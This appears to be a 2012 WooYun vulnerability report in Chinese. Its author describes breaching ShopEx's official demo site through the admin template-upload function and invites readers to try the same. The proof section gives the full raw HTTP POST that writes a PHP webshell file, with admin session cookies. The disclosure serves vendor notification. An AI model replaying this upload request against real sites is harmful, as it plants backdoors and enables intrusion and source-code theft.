当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06169

漏洞标题:shopex演示站后台上传木马,演示站竟然是开源的

相关厂商:ShopEx

漏洞作者: 江南的鱼

提交时间:2012-04-18 00:00

修复时间:2012-06-02 00:00

公开时间:2012-06-02 00:00

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-04-18: 细节已通知厂商并且等待厂商处理中
2012-04-18: 厂商已经确认,细节仅向厂商公开
2012-04-28: 细节向核心白帽子及相关领域专家公开
2012-05-08: 细节向普通白帽子公开
2012-05-18: 细节向实习白帽子公开
2012-06-02: 细节向公众公开

简要描述:

shopex官方演示站,目前来讲,安全性还是非常好的,现在了上传的文件内容,如果含有<?等就会自动转到主页去,所以我之前所利用的方法,抓包改文件名为:t.php,对官方演示已经失效了【其他非官方的,仍然有效】,原因是官网的演示站对PHP内容进行了监控,即便生成php文件,也是过滤了内容的,不能运行!不过我今晚发现过滤也是片面的,也存在一点瑕疵,我成功上传了木马,发现演示站使用的程序,竟然是未加密的,看来官方对自己的技术还是非常自信的!演示站地址:http://demo.shopex.com.cn/,各位喜欢的,可以去突破下,有开源的shopex等着你拿!
这个漏洞的Pank顶多在10,但是泄漏了Shopex源码,所以我个人认为从厂家的严重后果来说,Pank 20 不为过!

详细说明:

由于时间关系,不做多说,等我从上海回来后,再做详细的说明,这个是我今天晚上发现的哦!
之前的shopex 4.8.5 后台上传木马的方法很简单:
图示:


这只是之前用的一个方法。
这次拿演示站的方法和上面完全不同!
形成原因,主要是技术人员编程习惯造成!官方可以仔细检查下模板上传代码,也许就会发现问题。

漏洞证明:

POST /485/shopadmin/index.php?ctl=system/tmpimage&act=saveSource&_ajax=true&_ss=site HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://www.xxxxxxxx.com/shopadmin/index.php#ctl=system/tmpimage&act=detail&p[0]=yyq-info.xml
Accept: text/javascript, text/html, application/xml, text/xml, */*
Content-Type: application/x-www-form-urlencoded; charset=utf-8
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; EmbeddedWB 14.52 from: http://www.bsalsa.com/ EmbeddedWB 14.52; .NET CLR 2.0.50727; InfoPath.3; .NET4.0C; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E)
Host: www.xxxxxxxx.com
Content-Length: 1260
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: SHOPEX_LOGIN_NAME=admin; SHOPEX_SID=0da852eac4999ce82450c9234a6636af; SHOPEX_LG_KEY=ce38449d68a97f5e77985636c900721a; vary=27974dd2b5be612c11922ea4d6487e147a2343a361a328b9bae273711797bc1b; loginpass=f4f068e71e0d87bf0ad51e6214ab84e9
id=yyq-info.xml&tmpid=yyq&name=x.php&file_source=木马内容


来张演示站截图,程序是源码的哦!


再来张:


修复方案:

仔细过滤压缩包的内容!

版权声明:转载请注明来源 江南的鱼@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-04-18 10:36

厂商回复:

感谢您的提交,我们会尽快处理!
希望通过大家的共同努力,不断完善和提高产品的安全性。
非常感谢!!!

最新状态:

暂无